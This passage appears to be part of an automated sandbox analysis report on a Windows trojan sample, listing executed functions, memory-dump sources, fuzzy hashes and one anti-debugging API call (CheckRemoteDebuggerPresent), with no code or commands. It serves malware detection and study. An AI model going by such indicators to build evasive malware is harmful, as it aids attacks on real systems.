Opcode Fuzzy Hash: 46590626c92aaffeab020d32df9a362d1f1c1d746d983e9affddbde489c078ee
Instruction Fuzzy Hash: 8B21F8A2B0DA5A4EE79AEB3C84593B9A7D1EF94340F04057AD04FC3197DD28E80B9791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A50F3 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6258622893a802b81c1d013d67452faef5214b407eae5d8a4d30ba250c77a56
Instruction ID: 8c1f0aa793e54b2147745147d29d607ba4acc2e1e416b71fd796470e84d5a600
Opcode Fuzzy Hash: b6258622893a802b81c1d013d67452faef5214b407eae5d8a4d30ba250c77a56
Instruction Fuzzy Hash: 413118B0A09A1E8FDF55EB68C495AFCB7B1FF45304F100579D40ED7292DA38A842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A1F64 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a94b7aa82aa99492158c6426926fb8c8df3a38d6cbc1682c98bd604c709519b
Instruction ID: 3229a6787f74a89d9df240e6cdf93593fb3bb96a34cb513b26d207ac0f69a744
Opcode Fuzzy Hash: 7a94b7aa82aa99492158c6426926fb8c8df3a38d6cbc1682c98bd604c709519b
Instruction Fuzzy Hash: 0C11926171E6AA0FE70BA334C4995F13BA1EF49321B6841FAD49ECB187D91CE44BC340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A3CE8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1a55949e00ade76217081a7d0ec683a09387770589b4e062deb9d34047a784
Instruction ID: b9024c4557665b6a5cd59bc387d95df1e40a21a09be7d1e951106718185500d1
Opcode Fuzzy Hash: ea1a55949e00ade76217081a7d0ec683a09387770589b4e062deb9d34047a784
Instruction Fuzzy Hash: B411D3A2F0881D8EEB85EBACD8152FDB7A1FFC4200F800236D10DD32D1DD28AD068760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A017D Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfcf490b41efa97b1288e799dfed37f1177747dc4c3280668c89015c0da79812
Instruction ID: 26bdaaedcc71259adccd257f4a3c3c228a98ea8a2c1df49ad5c7decf49c30ca2
Opcode Fuzzy Hash: dfcf490b41efa97b1288e799dfed37f1177747dc4c3280668c89015c0da79812
Instruction Fuzzy Hash: 82018EA6B0D5650FD266D63DE4950FA7BE0EFC5231704027FE48FC3152EE14A94B8290

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A1BC1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47553b009666651d63dc601d6a50ab83607df18f10d55671fd2cead0629b05d
Instruction ID: 460e790ff54f197eefabfc9794a9e271ba946548aa7cc097f482034dc7113d94
Opcode Fuzzy Hash: d47553b009666651d63dc601d6a50ab83607df18f10d55671fd2cead0629b05d
Instruction Fuzzy Hash: D2F07DA1B0CB854FD7AAC63C94011E57BE1EFC923130543BBD48DC7246EA149D464380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A30DD Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2c52d695927597e68530993a93a1d3e315c51f65b8a325fea7c238ba9dd10b
Instruction ID: 34c536c45b65df2c8031e5dd6839e403a2bec1d61cff57ef633688d572d04fe1
Opcode Fuzzy Hash: 8a2c52d695927597e68530993a93a1d3e315c51f65b8a325fea7c238ba9dd10b
Instruction Fuzzy Hash: FB0162B090E7CD5FDB42AB3484595E97FB0EF06200F5445ABE84DC61D3CA389545C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A01D0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0198c1213e3b0f2145b83575fce8c972c92d819fa4d234608f993743a1f7e85b
Instruction ID: 2452da1992f0b616d27e379741b27f63d7a17aca70536151196d72da34e26613
Opcode Fuzzy Hash: 0198c1213e3b0f2145b83575fce8c972c92d819fa4d234608f993743a1f7e85b
Instruction Fuzzy Hash: 72F0E9A1F08A194BD6A9D52D940616973E1EFC8231704477BD84ED3355EE68AC424780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A3361 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6b6c00648800287767bf2a0c78a4d0dba27f9c47dfc430e015ffdf31d79c224
Instruction ID: fe5fce0f2822faf56a7e606858a0e20d2d013b9332c8c33d789e64e8cb194d21
Opcode Fuzzy Hash: a6b6c00648800287767bf2a0c78a4d0dba27f9c47dfc430e015ffdf31d79c224
Instruction Fuzzy Hash: 63F0E94150D6D54FE726973C44283E27FD19F96350F0DC0FAD48DC719BDA58A409D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A3409 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7b6125be2d209f263135d913d1900b83503e2a8a59d0c371358abf38288823
Instruction ID: e1246fa49ed148b73a9b77076f6f5924ea90161028734c471cc37ffbf6c56ad0
Opcode Fuzzy Hash: 8c7b6125be2d209f263135d913d1900b83503e2a8a59d0c371358abf38288823
Instruction Fuzzy Hash: 7EE0C2B2B0D90A9FCB96E62CC0055A4B7A0FF843003104ABAC00EC31A5DE24E805C794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A3F4A Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a636a7c43a2c72124efb5e7769888a27520fdeac41c8d681a0d28fae60eaa8c0
Instruction ID: 3256b9d9dd65d2ca060cb97f68bc58aa0d7bf16ff108930387f69a84fcebc068
Opcode Fuzzy Hash: a636a7c43a2c72124efb5e7769888a27520fdeac41c8d681a0d28fae60eaa8c0
Instruction Fuzzy Hash: DED0A7A151E99FCFEB46FB3C409922937B0EF5A241BA448F5D40CCB657DA25D889C321

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exePID: 496, Parent PID: 3452COMMON

Executed Functions

Function 00007FFBAC190160 Relevance: 1.0, Instructions: 1004COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c4677acb904a9ddb61f61b44c61e4f2d970ca661101c8ba8c8387e73d157bb
Instruction ID: 5a0954764877640e736cb0afa9dd98a3b4d8855b28c12c3ca61c16b6812af694
Opcode Fuzzy Hash: 76c4677acb904a9ddb61f61b44c61e4f2d970ca661101c8ba8c8387e73d157bb
Instruction Fuzzy Hash: FE62D6B0719A094FD75ADA38C488A7973E2FF95304B24467DD88BC7696DE35F882C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC19048D Relevance: .8, Instructions: 813COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dbca51c4623e8993aefb0a9e6a4cc914209dc1bbd291a462250ac1d1e56fb6
Instruction ID: 9e4c96fe40f595b36ada00d74c1fb7fdff7d4497cb39605631b621f56a8eca21
Opcode Fuzzy Hash: 34dbca51c4623e8993aefb0a9e6a4cc914209dc1bbd291a462250ac1d1e56fb6
Instruction Fuzzy Hash: 83326AB1B199494FE74DDB2CC489639B7D2EF99305B5442BED84ACB297DE34E8038780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC190178 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFBAC190FDE

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 02e1bec4489df8ee8cc4c2a220182b90a77d0931b7fac7fe4d8c5de5a110fd56
Instruction ID: ed8c38b1976bb17ba0b7ad75899c8e39389cd215d984d8a45859d4e80aa107a7
Opcode Fuzzy Hash: 02e1bec4489df8ee8cc4c2a220182b90a77d0931b7fac7fe4d8c5de5a110fd56
Instruction Fuzzy Hash: B6714DB1B1D6450FD35BDB7884592A9B7D1EF89300F1441BED48EC72E3ED29E8428381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC190F88 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFBAC190FDE

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: d821bcb3b083883235cc59928ec06e9ff6fb7082afc35a57ad4617b02885ebd9
Instruction ID: e76ca58e5808041f19461479dc37519e6ffce99f60ce257817d8e52445beef62
Opcode Fuzzy Hash: d821bcb3b083883235cc59928ec06e9ff6fb7082afc35a57ad4617b02885ebd9
Instruction Fuzzy Hash: B9217CA2B29A590FD30ED97D9C4516877D2E7CD301718827EE98BCB3D7EC24EC068281

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC194341 Relevance: .9, Instructions: 904COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea41cf2ee6b183df99d794fc8079f24f16f0c7295e91ad0e1679cd5dcadab56b
Instruction ID: d03d53a67c5a97f8559c7f82375ebb6543f8b8b358e2f01a025537f94208c1bd
Opcode Fuzzy Hash: ea41cf2ee6b183df99d794fc8079f24f16f0c7295e91ad0e1679cd5dcadab56b
Instruction Fuzzy Hash: 0D6272B1B1995A8FEB86EB28C4587B973D2FF94300F5445B9D40EC72D6CE29E842C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1937D8 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ea3206c13419d5fba8dfae90c955301a027d2c5d08ebcbbdec34d2b4fde4a
Instruction ID: 5520905a772d7767851cf27ca48a7cbf390755742387eb81f7127019e1cfb02b
Opcode Fuzzy Hash: 5d3ea3206c13419d5fba8dfae90c955301a027d2c5d08ebcbbdec34d2b4fde4a
Instruction Fuzzy Hash: F8D19661A1DE5D8FEB99EB3CC4956BAB7A1FF94340F4005B9D04EC32A3DD24A906C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC190C15 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 315abd3915bac6b11c7da8acf815a78e87402f86635d1fb205d21ed6fefd2494
Instruction ID: 4634083387f6cf0c28e13d3ae914d627d54af3562c95c6e255b638cc2458d398
Opcode Fuzzy Hash: 315abd3915bac6b11c7da8acf815a78e87402f86635d1fb205d21ed6fefd2494
Instruction Fuzzy Hash: 4AA1EAA2E1DA4A4AE39AEB7884552A9F7D0FF94310F0406BAD44FC35A3ED28F445C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC193439 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556ed3687d4c92170ca5038b88d945e6bc9b101a0225cbdb28c7f1277b4e03b7
Instruction ID: b3cc2114ab79a7906b917e2bb3a67b2ec226f2b68c9907c0fc60dbcdf1b2b230
Opcode Fuzzy Hash: 556ed3687d4c92170ca5038b88d945e6bc9b101a0225cbdb28c7f1277b4e03b7
Instruction Fuzzy Hash: B681A2A1B0D95E8FEB97EA2CD4583BD77E1EF99210B4401BAD80DC7392DE19D8068351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC193FF5 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad728baa560a5802271db730ddc9625e64a7b2a18c92f856657aec6f52bcd24
Instruction ID: 09db41a989241227ab80fce4ff82e019ec6ad77bc8ce68788159f7a6c2969eaa
Opcode Fuzzy Hash: 1ad728baa560a5802271db730ddc9625e64a7b2a18c92f856657aec6f52bcd24
Instruction Fuzzy Hash: 0D914E70708A188FDB99EB2CC459B6977E2FF98701B5545B9E40DC72A6CE34EC02C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC191989 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d00d11e0b99f5631260c75d367061f59a9d5eca9064ee28e3fe5dcfbdb25e4
Instruction ID: 88a5c2bd18350abcae4a7097f87dff3220ef9664740c68301eb185c5431734c0
Opcode Fuzzy Hash: 32d00d11e0b99f5631260c75d367061f59a9d5eca9064ee28e3fe5dcfbdb25e4
Instruction Fuzzy Hash: DD5183B0619A098FD71BEB38C494AB573A2FFA9304B6045BDC54BC76A1DE35F842CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC195009 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343fa3518aab3188dc08794b5cbc7d677d8960aa9343254070a616b9fc591b49
Instruction ID: 56b650882df191da495d6f12226264c182f771bba16c2faaba4337d3225fafeb
Opcode Fuzzy Hash: 343fa3518aab3188dc08794b5cbc7d677d8960aa9343254070a616b9fc591b49
Instruction Fuzzy Hash: 90518BB1A18A5E8FDB96EB68C458AED77B1FF45304F1401B9D40AE7292CA34A842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC07F5A0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.493578610.00007FFBAC07D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC07D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac07d000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b467b17d53b9e4a812c942d5ba83479df3fcd49e1ee137147b78b928ddae9e5c
Instruction ID: e02aacf98e9e6ce38b6a22f57b1d2592436469cb720bfe1a05828f46b1d3ee53
Opcode Fuzzy Hash: b467b17d53b9e4a812c942d5ba83479df3fcd49e1ee137147b78b928ddae9e5c
Instruction Fuzzy Hash: 9C41B1B140DBC44FE76B9B38D859A923FF0EF56220B1501DFD488CB1A3D725A856C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC193BE5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aadb2de3a17b35c2979de3b778759fa670895070ac7ddd09a2eac5be0e650fb
Instruction ID: b63f17e93df4ce35d57b6af9271962ad2972ea2d326b21a9bb3859b92fcad881
Opcode Fuzzy Hash: 8aadb2de3a17b35c2979de3b778759fa670895070ac7ddd09a2eac5be0e650fb
Instruction Fuzzy Hash: 0C21E6A2B0DD5A4EE796EB3C84593BDA7D1EF94300F04057AD04FC3293DD18A80A9391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1950F3 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad78a73a806c2029fb648c4549253f967279ac582086f7271bf31d52557d5bb
Instruction ID: b8554b316028c9e2645cc07c11b04ea6ed4e8f61c1adc697ea75ca07d498e3af
Opcode Fuzzy Hash: aad78a73a806c2029fb648c4549253f967279ac582086f7271bf31d52557d5bb
Instruction Fuzzy Hash: 69312BB0A1951E8FDF55EB68C499AFCB7B1FF45304F100279D40EE7296CA38A842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC191F64 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb755346372559a4d8ef3418d704b6f035763719fbcd231634dd0cc63e51324
Instruction ID: 548775e8e15d0d65022d210837d902a25cc4204a9ae0c2a06c5b397e2924a2e8
Opcode Fuzzy Hash: 9bb755346372559a4d8ef3418d704b6f035763719fbcd231634dd0cc63e51324
Instruction Fuzzy Hash: E2117F6171E66A0FE70BA334C4995F53BA1EF5532176441FBD45ACB187DA1CE48BC340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC193CE8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb94c0051d9b2c84f5a573a0df5d19bcf47866ca7861dfd5109a26d26e24070
Instruction ID: fca925fcd2d59f3fec9125c19ed04b411b1099a90b7277f204a5601e13e171bd
Opcode Fuzzy Hash: 6cb94c0051d9b2c84f5a573a0df5d19bcf47866ca7861dfd5109a26d26e24070
Instruction Fuzzy Hash: D91196B2E1881D4EEB86DBACD4152FDBBF2FF84250F400235D409D32D1EE696D068750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC19017D Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3466bd2568f2862104ee19691f201e2898e344f1ab2fc2edf529c6c5efab6b28
Instruction ID: 07f4a590c36a9eae926039e88917b26140cb281a7e74a599d66c46ecbdb6377c
Opcode Fuzzy Hash: 3466bd2568f2862104ee19691f201e2898e344f1ab2fc2edf529c6c5efab6b28
Instruction Fuzzy Hash: A001AB63B0D9650FD261D63DA4551EE77E1EFCA231304027BD48AC3252DE14A98B8290

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC191BC1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b29282d10ff46e969f7dd47f5423888ff887d34d587714263129dffc34f637d7
Instruction ID: 3d8229875108f5a6458379fad972bcd0e408ff42b17aa09eb314472b55d75e82
Opcode Fuzzy Hash: b29282d10ff46e969f7dd47f5423888ff887d34d587714263129dffc34f637d7
Instruction Fuzzy Hash: 2EF07DA1B0CB850FD79AC63C94011A57BE1EFCA23130543BBD489C3243EA149D424380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1930DD Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33a40469fa24dfd7f46567c6edc9006cb9c2f7fecb6a20630f6dd0520b27b73
Instruction ID: a57cdea7e532d18a9be34c94f2390eda09f5448080e6845941b179fe949aa3de
Opcode Fuzzy Hash: a33a40469fa24dfd7f46567c6edc9006cb9c2f7fecb6a20630f6dd0520b27b73
Instruction Fuzzy Hash: 3A014FB090E78D4FDB52AB7888595ED7FB0EF06201F4445BBE84CC6193CA389545C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1901D0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f16d1b8d1a0551297ec8504c1aba79c03dfcdbb976fe735efb9e1bb2f2053133
Instruction ID: b97e45e56c75d66a41ff81a8ecea2a94104b935fdf20ed9cfc50d607b715d803
Opcode Fuzzy Hash: f16d1b8d1a0551297ec8504c1aba79c03dfcdbb976fe735efb9e1bb2f2053133
Instruction Fuzzy Hash: 8BF0E961F0CA190BD7A9D53D940622973E1EBC9231714477BD84ED3355DE24B84247C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC193361 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 089d5c3917c6c87a7ed9af6cd6a252c2920b352c5cdbf664c0d962a84d779265
Instruction ID: 70142d78eab39425ed01af715c7e6b50ccb4979b4fb68c07463aa7ab16297e58
Opcode Fuzzy Hash: 089d5c3917c6c87a7ed9af6cd6a252c2920b352c5cdbf664c0d962a84d779265
Instruction Fuzzy Hash: 21F0245090DA888FE726873C44183B27EE1AF92340F0880FEC48DC719BCA286508C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC193409 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.494116003.00007FFBAC190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffbac190000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ff15967f0d829c8463a0273762f2a2fa1cc2774284fed0229a314e8cfabcae
Instruction ID: deafd48d9ce27cb3a0fe342e4102afe24835372720c74c896eaae86402bc0ccd
Opcode Fuzzy Hash: 30ff15967f0d829c8463a0273762f2a2fa1cc2774284fed0229a314e8cfabcae
Instruction Fuzzy Hash: B6E0C2B2B0D80E9FCB96E62CC0455A8B7A0FF843003104ABAC00EC31A5DE24E805C7D4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exePID: 6648, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	26.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.6%
Total number of Nodes:	17
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFBAC18E27D Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFBAC18E330

Memory Dump Source

Source File: 0000000B.00000002.561131601.00007FFBAC182000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC182000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffbac182000_HEUR-Trojan.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 0fd150b3e0c5eac11035266ecac95752da6cf27f41ce9db7aca45ef8d1e30b27
